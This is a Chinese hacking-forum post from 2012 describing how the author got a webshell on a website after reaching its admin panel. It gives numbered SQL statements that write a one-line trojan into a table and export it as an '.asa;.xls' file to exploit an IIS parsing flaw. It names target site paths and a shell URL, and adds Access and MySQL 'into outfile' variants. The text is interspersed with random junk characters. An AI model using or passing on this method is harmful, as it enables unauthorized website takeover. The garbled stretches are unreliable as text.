好不容易进了后台,发现啥上传啊。备份啊多木有。7 ]4 R8 P: W2 q% s
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
C9 f O/ v5 ?1 Z$ ?9 Q2 q: O' K文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,6 k# ]+ }, q, F o
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
7 s+ B+ ~1 d, s+ Y1.create table cmd (a varchar(50))
. D$ f0 e j$ s% O5 {* P$ p/ K) a2.insert into cmd (a) values (‘‘)$ O- W' N% K- k* @, x. ^0 N
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
* h+ r8 G; }$ y(把表cmd的内容导出为物理路径的一个EXCEL文件)3 u( j$ ]3 ~& c' |) ^
4.drop table cmd
2 T9 I2 l' V) d% D$ D2 `4 E4 q7 s利用IIS的BUG成功拿到了WEBSHELL。( {2 r4 k* M- U! K5 L1 k* h
- z& l/ M3 j* l1 W9 r直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话% P9 P" t5 k# x4 o1 A7 E7 c
8 ~3 O1 Q1 t: k- e: v2 \# J
SQL语句意思解释:
/ j# t4 }) D! W! J' @' ~" D 第一句
+ k' K1 B9 z. \5 S; r 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50) J2 Y3 z P1 N* L
, y2 p( S) X$ j1 s 第二句4 Z1 A( p6 R8 s
在表cmd的a字段插入一句话木马: W, V: f) g8 k0 L. }7 ]
第三句
1 U# z) o- f6 L- ~6 V* Z& Y) G 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件0 u7 [; D! H2 h# P; l- e7 b v# C7 ]
8 m- F1 o/ K, L
第四句
- Y% B! y( k/ h% `1 R 删除建立的cmd表6 k8 f8 t7 e: h7 s2 Y1 P8 A+ a- E
9 w/ D) o- D9 e P* w0 u. F: c 以下内容为测试:: t! ]' ?, E6 b+ O( u3 y2 X
Access利用后台SQL执行命令功能导出WebShell:
( B7 Y6 ^& y2 m9 `' K! h6 X 这个更简单:1 ^. O8 I5 {$ a5 R; i; z/ ~7 Q
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
) ^8 I& ?$ U; Q$ _ 或者
5 Z. I j. n$ D [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]: E# W9 i% x/ X4 n, Q
* S- u8 n* g8 |1 x
后台有执行SQL语句功能(vote为已知表段)
G/ s3 M# u/ V% i 希望对大家有所帮助拿shell的又一个思路
v4 a4 o# w9 F! ^. }3 m& M |
发表于 2012-9-13 17:53:58
收藏
支持
反对